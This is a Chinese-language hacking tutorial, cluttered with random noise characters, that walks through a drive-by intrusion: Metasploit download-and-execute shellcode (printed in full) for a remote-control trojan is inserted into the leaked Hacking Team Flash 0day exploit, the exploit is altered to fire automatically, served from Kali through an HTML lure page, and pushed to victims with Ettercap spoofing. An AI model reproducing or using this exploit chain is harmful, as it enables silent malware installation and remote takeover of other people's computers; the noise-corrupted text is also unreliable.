|
; a% o5 z& a% q 三、flash 0day之手工代码修改制作下载者实例入侵演示 3 K( \( G( N! E( C; ?: T: y; x
" D; \* q4 D ?! r0 h+ u7 t# y {
5 Z$ |) K! {. M L9 ^
利用到的工具: 6 j& H0 d( d/ w4 g: T. x
2 [1 k- m! L( Y0 W
# g+ M5 ~6 K, T) D) o Msf - h2 e5 A7 x9 G k4 @4 O
" w9 C7 m) s) l& ~1 F5 u$ [+ B
* d% Q7 A0 x0 X m Ettercap + c' ~: w' i8 n0 |7 r1 m. O
0 G, X6 p) N6 X ?- S0 g/ A$ n: C
Adobe Flash CS6 " H7 T8 L; u, x1 A# Y
9 e5 ~7 ~1 T7 n6 w! p
u6 W9 L: l- E9 n1 p Hacking Team Flash 0day-可冲破Chrome沙盒-Evil0X源代码一份
3 M. J2 U. a/ i- Y' O0 o 5 d4 v1 o- H2 {; W
8 w2 g! y: k1 {- @1 z 下面我们就开始演示入侵,利用msf生成shellcode,首先打开msf执行use windows/download_exec,show options
) e- Q2 i! f) Z9 G1 W2 Z0 s - g p, G: f6 r T/ T
1 @2 A1 E8 f) C: c" l$ i
如图:
; S- I; P/ t1 V% P& e + p+ N% N' |3 _, a$ z" I
$ J+ w) |! |" R# |# v" l: J. [6 @
3 g) J/ Z: P ?# `" a7 _
4 z5 G1 w# n, Q( k/ T; I5 P! P: [0 ]. d: `% x
3 P$ t8 K8 G% {2 s& l0 M
: k; J+ \6 s! v$ W$ Q' R( ?/ h
& E8 H( ?0 H4 S) i+ F& c8 d( R _ 然后set EXE system.exe,再执行set URL,需要说明一下URL就是我们的马的下载地址,这里我们用远控马,远控配置使用不再详细说明。。。如图:
6 @3 l% }7 D( r) b& ^7 ? 7 c+ h3 `7 H1 K& w
5 g! {/ I3 Z$ i' y ; Z/ @) S0 e$ Z; x* G8 W3 m
A% y% y" ?; Z3 V7 d
$ k" O) j5 y6 U n: f4 v0 v
& p: r! ?6 ~& ^1 k7 O
8 H% {2 \/ y; R0 e' e
4 X3 B* j% d: p- @) D 然后执行generate -t dword生成shellcode,如下: $ o5 w4 S. W4 S8 y# l4 H
+ S/ F* M& }& a( \" P5 g
8 T( O6 V. a# r. F- O) x4 F
9 p% n; ` M8 C6 ^+ `
7 K/ f6 [9 p% q+ M. n a! }; q5 `1 |1 k6 i2 s" ^
复制代码到文本下便于我们一会编辑flash exp,如下:
2 N) M% Y4 M' g % m- z+ S0 i) r/ U$ E
, O8 o& V9 C$ C4 d( t8 G# w4 ? 0x0089e8fc, 0x89600000, 0x64d231e5, 0x8b30528b, 0x528b0c52, 0x28728b14, 0x264ab70f, 0xc031ff31,
3 L8 m! K6 n L$ O$ e8 L
& _) W3 _* E) r) t4 A+ q% A9 _% {, q
0x7c613cac, 0xc1202c02, 0xc7010dcf, 0x5752f0e2, 0x8b10528b, 0xd0013c42, 0x8578408b, 0x014a74c0, / \+ @ z2 r% T- e
; D& w4 z5 s( S* i* @+ l
. K6 O6 ?; J. G* F& G6 H* G3 N 0x488b50d0, 0x20588b18, 0x3ce3d301, 0x8b348b49, 0xff31d601, 0xc1acc031, 0xc7010dcf, 0xf475e038, & Z+ Q, C' o/ E% D" V8 i
2 _4 _. E/ h7 `$ f4 c
( b9 U( I5 m/ W3 x% d5 y8 ^, W 0x3bf87d03, 0xe275247d, 0x24588b58, 0x8b66d301, 0x588b4b0c, 0x8bd3011c, 0xd0018b04, 0x24244489, 0 F" D& X) ]1 Z/ n/ }* m3 G
0 g8 |3 q+ d( h0 R# t9 `# \
3 {9 @) }7 d j( w! d: g1 V 0x59615b5b, 0xe0ff515a, 0x8b5a5f58, 0x5d86eb12, 0x74656e68, 0x69776800, 0xe689696e, 0x774c6854, 1 k8 C9 a- p* I& g) ?" I
, K9 G5 I! o. h/ G' w, Q
* Y* W- e( P# }" Q3 O4 I; i. c
0xd5ff0726, 0x5757ff31, 0x68565757, 0xa779563a, 0x60ebd5ff, 0x51c9315b, 0x51036a51, 0x53506a51, 3 ?9 v1 h1 _5 w0 D. L0 j/ B8 O' w
4 e2 t9 D5 Z* F
* d* Z( [* \% ]' ~0 o; Q0 F2 Z$ x4 `
0x89576850, 0xd5ffc69f, 0x31594feb, 0x006852d2, 0x52846032, 0x52515252, 0x55eb6850, 0xd5ff3b2e,
R2 N0 T4 j$ Y* @5 L ( a3 ~* d4 \# x
6 r1 L, A$ u) E! ]4 N6 D1 Q2 Q5 M. ^ 0x106ac689, 0x3380685b, 0xe0890000, 0x6a50046a, 0x7568561f, 0xff869e46, 0x57ff31d5, 0x56575757,
( C% i1 ~, {& u6 e. O4 ? * Y8 o) I) K: |
2 g# q- ~- [: }1 F" \3 `
0x18062d68, 0x85d5ff7b, 0x4b1f75c0, 0x007c840f, 0xd1eb0000, 0x00008ee9, 0xfface800, 0x732fffff,
/ o: y$ H2 ]* h( w
8 x6 u' Z# z, D, V& _4 ]- g( i `
0x65747379, 0x78652e6d, 0x6beb0065, 0x505fc031, 0x026a026a, 0x6a026a50, 0xda685702, 0xff4fdaf6,
/ q5 }- Z& M; q0 O9 I8 w4 H 1 \' D+ W1 @/ z3 Z* N1 R
* `% ^1 M, Q/ w. ]2 U/ D
0xc03193d5, 0x0304b866, 0x8d54c429, 0x3108244c, 0x5003b4c0, 0x12685651, 0xffe28996, 0x74c085d5, + s. ^' g& q) F# i# e0 t! N6 x( c8 ?
8 {0 L$ P, \6 G6 Q4 j F* _3 m$ |( J2 y$ _
0xc085582d, 0x006a1674, 0x448d5054, 0x53500c24, 0xae572d68, 0x83d5ff5b, 0xceeb04ec, 0x96c66853, 0 S2 V" E0 W, }2 V
q5 A$ t& r5 Y: r. s
3 g( p) Y, ]' _ 0xd5ff5287, 0x6857006a, 0x876f8b31, 0x006ad5ff, 0xa2b5f068, 0xe8d5ff56, 0xffffff90, 0x74737973, - X3 ~% i# D4 b
3 I# y% e# j2 o6 D6 ]3 _- ]/ l+ K* U( Q% [
0x652e6d65, 0xe8006578, 0xffffff08, 0x2e737378, 0x64696162, 0x6b682e6f, 0x00000000 # H/ j2 v1 w- g! d- W
9 T! O$ G- W' e0 _/ r4 x
6 w+ T1 p" Y% H6 ~ 5 c I/ a% I# m6 E8 i$ I/ h& x
! }/ D8 f0 a/ J- X5 H3 N: b. `" m2 ~9 P
0 m. D/ \+ j& j5 c1 [2 M : D$ R0 r$ I; z
; H8 G; f4 ~. t- T% ?9 ]) I 下面我们来修改flash 0day exp,需要修改三个文件,分别为:
1 R) _3 q+ g% L: q0 X: E1 H 2 M3 x2 t7 m& _8 ?6 q8 x
1 {9 F4 [" t: b0 F1 T9 b
$ J5 H+ s' e0 Q/ C* I$ X * f1 a7 B" w9 J% p# [' j
) k T' w$ N l9 c3 {; T: q" x$ b
先修改ShellWin32.as,部分源代码如图:
8 y. e2 O& P) |$ d
+ w3 X9 }1 @8 I; r, P8 i* I+ z8 |8 R+ e- S3 A5 `
O* C) A1 o" v0 {( Z7 E 4 `, O% d+ I3 Q, s+ a' M( \& @
+ y2 p+ P* x- I" A- j
我们需要把标记处[]中的代码改成用msf生成的代码,修改后如下: 5 Y: d$ d) a8 t5 {2 T
4 ~" w- v6 G, e, m4 ]- {
0 e0 [ _+ h: J' |' j1 V
# J! {4 X. t, V
& M' d) X$ h& S$ j
5 b8 k; E& [" i P/ W% m 然后保存,ShellWin64.as的修改方法如上述,不再演示,下面我们来修改myclass.as,这里需要说明一下,因为此exp生成的利用程序,不能直接自动触发flash漏洞,也就是需要点击按钮才可以,实际上在做渗透的时候需要把它搞得更完美,所以就需要修改,修改方法:搜索myclass的某个字符doc.addchild(btn);如图:
6 L! m @/ j, E* c! `- M3 c* r+ B
# S3 W6 B8 H0 i
/ @2 ]: R" @( x
i# F# i7 N7 O; `& ~) Z ( Q' j9 A9 Q" H+ K0 Z( l% h% A
# l! v( F5 v/ n; ?: n 换行在后面加一句TryExpl();注意是l不是数字1,然后如图:
' s& R0 |0 @& L+ b' H$ Q e 5 B% D8 k+ X" ~0 \
. [$ C- r# q' f0 D; m+ a- P, {
" C& l# g+ l6 h/ \ @ $ A0 J2 r+ @* E# M' p& R7 Q
6 G2 ]8 q8 ^3 o3 Z3 P4 T6 Q8 }
( C' R0 i" ?9 f. `& W# G
o7 @! [( y- j. ]" f5 s9 H
) F; p$ Q! u7 l$ s- x. P* R+ C+ {
4 D1 y& D* B& g
7 d- T, e4 f ?) }6 ?+ L$ O- G- q) J$ ^) o
然后点保存,下面我们来编译一下,打开
! v% H1 B+ w6 a! }; w
' v9 `; t( X3 F+ R! N+ p0 }' S% m* x2 Q
exp1.fla然后点文件-发布,看看编译没错误
7 ?5 I* J4 ~9 g; Y/ p. r 6 o! `4 @8 z+ } f. `) \0 v& _; H
' f2 P+ x5 r# n* U2 O3 x& a
: v& g6 _1 l1 g0 }" H& \% {. s
& d* J j4 w5 @* R" w- S2 x7 P& F2 Q( o4 ]' u% ~# r# ^
$ i" A8 N0 x. Q, O6 M$ i
8 R: L5 }2 g: P1 T D* |8 t
) `# R$ G' s# C& H 6 Q' n$ Y, E, H
( s+ G5 E7 s/ `& X: r) ^: s
9 }( G: G* c/ P U + o& Q( {; ?6 _9 r! i( M
5 S$ P: {; D+ q$ D2 q/ {) \- |: I8 q4 a- C) C. L9 d
然后我们把生成的 - V; ]# i1 S. O B1 ^0 j
- O+ X6 e7 O; }9 W
# p. C3 A1 N4 h exp1.swf丢到kailinux 的/var/www/html下:
' f1 [7 Q1 P) t4 ?# Q' s2 p
0 q6 O3 Q& J: k$ ?3 D% K( K+ L L* Q" `# L, }1 ]0 ?
然后把这段代码好好编辑一下
0 `- N" z W. c* f7 E
+ k; X8 e/ |5 S1 P9 U$ H( j/ n3 \1 o7 J A% [% }3 Q& E
' P& r. y! z. U3 K4 h1 G
. T2 s" P/ f# s5 Y% b F3 x: j: r! r( n1 V' v8 r8 s* j
9 B) g% J; p& s, f+ C8 O+ q. j
, Z" n& x, M1 w$ c, s3 E& e: o
0 W6 l! \0 }: ?+ c1 P2 |' V& _- x2 }
0 q" n m" ]& T $ x7 O: c+ |2 ~* I. \7 u
+ E5 p( r9 {" h0 W' U/ \2 I & C3 a; Y ~9 s
6 T/ W, e& W" \% Z( E& S/ {; m/ m9 t6 {- W2 K
: P, f. b& H: x4 I% `6 \* R$ j
! P& X! @5 }5 D: |# q
$ G; @7 E( u' M- [! d
- z( r- G0 B! ~7 @& u
; P- G* c/ Z5 G. f9 ^8 l
( U! T _1 F- }1 V <!DOCTYPE html> + K1 V- ]$ e% Z t+ O+ W
% @7 B/ E/ g. A, g- D. V
: n2 P! o9 q2 s& j) N <html>
/ Q9 b) y# N# R 9 D$ s1 q' m0 x- \
! A5 Z+ I. \! \3 Q7 N) |
<head> e0 o" |% g' [0 D' H0 L/ l, R: i
" v$ G3 r; t# ]! g' \
% X' q- W- ^ z
<meta http-equiv="Content-Type" content="text/html;
: w9 N2 T, Z _+ d& s/ I% T- @ Z) v; i1 }: P7 d1 Q
0 K7 a0 U7 y/ Q3 f; P! ] charset=utf-8"/>
* A% f8 e$ M8 {3 u & P' A! y+ ?/ U3 J+ H" S- U
6 F$ ^8 f" F, r4 v </head>
7 Z* L" i2 a4 ^9 f8 {
5 {6 P0 r% m! a) V/ r' P
: ^7 v4 W5 r& H <body> ( Q1 v- d, J' B: D. c2 v
9 X( L! l$ Y: P2 D9 ]! a# M/ _+ @6 l+ T( w- ~5 d
<h2> Please wait, the requested page is loading...</h2> ! w2 E1 e. W# b' w5 I
4 u& e0 ^, V4 L; e3 f$ D6 b1 {
5 k+ H% f6 K H) O1 @5 X
<br>
$ D) Z6 E% f2 T, ]' K% L
6 D5 B. }3 D9 e5 i4 Y- S1 @
( n0 Z, g2 g/ T5 M3 D" O <OBJECT
7 o2 L! E' a, T, \8 u
+ ~9 ?; x+ s7 q5 |# e2 z+ x! A1 k) A4 L
classid="clsid 27CDB6E-AE6D-11cf-96B8-444553540000" WIDTH="50" HEIGHT="50" id="4">< ARAM NAME=movie 5 C' R( h* Z% |7 n/ c1 E. g& w
8 r* ]) _5 S, \1 H
" Z% ^% x" U& W4 R VALUE="http://192.168.0.109/exp1.swf"></OBJECT>
" a! }* f J4 P0 P: w' w" z7 N5 v * [" r6 D0 S7 e3 k/ [" I2 O+ ?
8 O! ~2 Q! ]0 |3 d7 q6 X
</body> ; z+ @* E( x8 J* N6 Q
) q( k8 F: W3 j4 p. D' l8 e/ g
$ `% l. _5 P/ Q+ ?0 T' U: Y
<script>
! T+ k3 {5 d% P0 Y4 o
$ Z% I$ ^' R/ T7 y# ~ [
: I1 O7 ?) s3 S# o. u setTimeout(function () { : Z; r( s0 f: g* l4 ~
7 K2 l5 Y' `) A. l* m% |9 Q8 |; ^" M' l* \) J- D* e
2 n2 v+ @- h; m# {+ _- d8 y
2 {" h! d% Z( U) @" F; [
5 X+ b7 a$ n1 f w% h window.location.reload();
8 ` Z) Y) Z% W# [0 r0 R& e( F & J3 r# J, h5 ?; n% m/ V
; o$ t7 F" b& M& Y3 K+ F }, 10000); 8 a" z. c% l/ L0 S3 x$ @
+ Y3 m& R6 v3 t* S" t9 T2 h" t
9 W# U) M3 \- R6 T' y+ B ( u# f7 N* p: b; V3 N: Y; u* c
3 w% E0 [' {! O5 l
8 t& G( d% Q. Y6 R
</script>
0 z) P/ b/ g5 S/ z0 W- T
' ]0 t6 E: Z5 y. @" `5 J% p) i5 f( _
% ]; f/ M8 K& N, R2 ^ </html> x4 q& Y) z1 s' V4 c
( o$ ^& d& X( i1 G* R# \2 t0 ?: P- @1 y
5 n+ W+ _" B6 [; ~4 P
2 h8 p: W: A- m* [! ?$ z6 R- `6 {5 X# |" M
注意:192.168.0.109是kali的ip地址,这时候我们需要service apache2 start启动一下web服务,然后将上面的html保存为index.htm同样丢到kali web目录下,测试访问链接存在如图: : s$ x2 X! T' d8 v; @. J
3 X0 \8 Z4 J4 L" c/ o O, m' y' m3 B$ d8 {- r2 Z8 g' l4 A1 |' ?$ c
4 e( X \3 Y2 d) E1 D) P W& Z: {
% K; S/ _0 a2 E+ C( w
- \9 A0 \# g4 z
|3 Z/ u8 m3 c% ^2 k) m$ u/ b3 _
2 I( T% b! s/ R+ S0 g! `
3 M" ?' r; `7 h7 P/ Z1 h5 M
* E( N. R& d6 T. U. [/ o * x, y/ R1 M/ R! o% `9 J. }$ I
2 `( F) E3 x0 ?& Q3 }
: q# M9 H- g' S* r6 w
. p/ F7 U' X, l' W
* Q0 r; z T( f6 V, y( f$ r7 ~ 5 A$ j: R: v) O+ f
$ j7 y# @1 W8 t' l" k
( }7 @5 O! Z* [; C6 \) ]& |
下面我们用ettercap欺骗如图: ) C1 x w J5 P* z: v
' d0 s6 g g4 C5 V5 q
+ y5 V6 K! K8 d+ M3 @1 {; y2 I$ U: k
! O- y6 C! b& G: I " ~. M S) y$ Z7 w0 n
# j& k+ _. S: I( H
- P7 R6 F" Y$ `# L7 O
" [: d, j0 `1 k% y' S2 U, \8 s$ e* w+ B4 I7 @9 Q2 I. ?
下面我们随便访问个网站看看: . t/ o' R% g$ Z" @9 h3 M
' L: u' B4 j, z, A
/ h" i/ ]! g6 {% m& L 我靠我发现直接用ettercap欺骗物理机装了腾讯管家照样可以欺骗成功,如图: ! g5 w% J7 ?3 ]: y$ R
* _) ^0 A" `; }$ G4 W& _2 [
- }' B9 X D, ]( s( r
1 L( z Q* n9 }$ s+ ?! [
5 l( i# g# }) V! ^; }- [
- ~9 a4 Z7 M5 ` 我们看另一台, ' l3 D! z! G3 h- a& Z1 S0 ]- |
" k: p: P* j1 B% C( P; Q% K$ f
. F9 }+ o0 n: P( D# H% o. q. N 提示这个错误,说明木马是成功被下载执行了, 只是由于某些原因没上线而已。。。 $ ^1 P4 X" `+ D4 v
|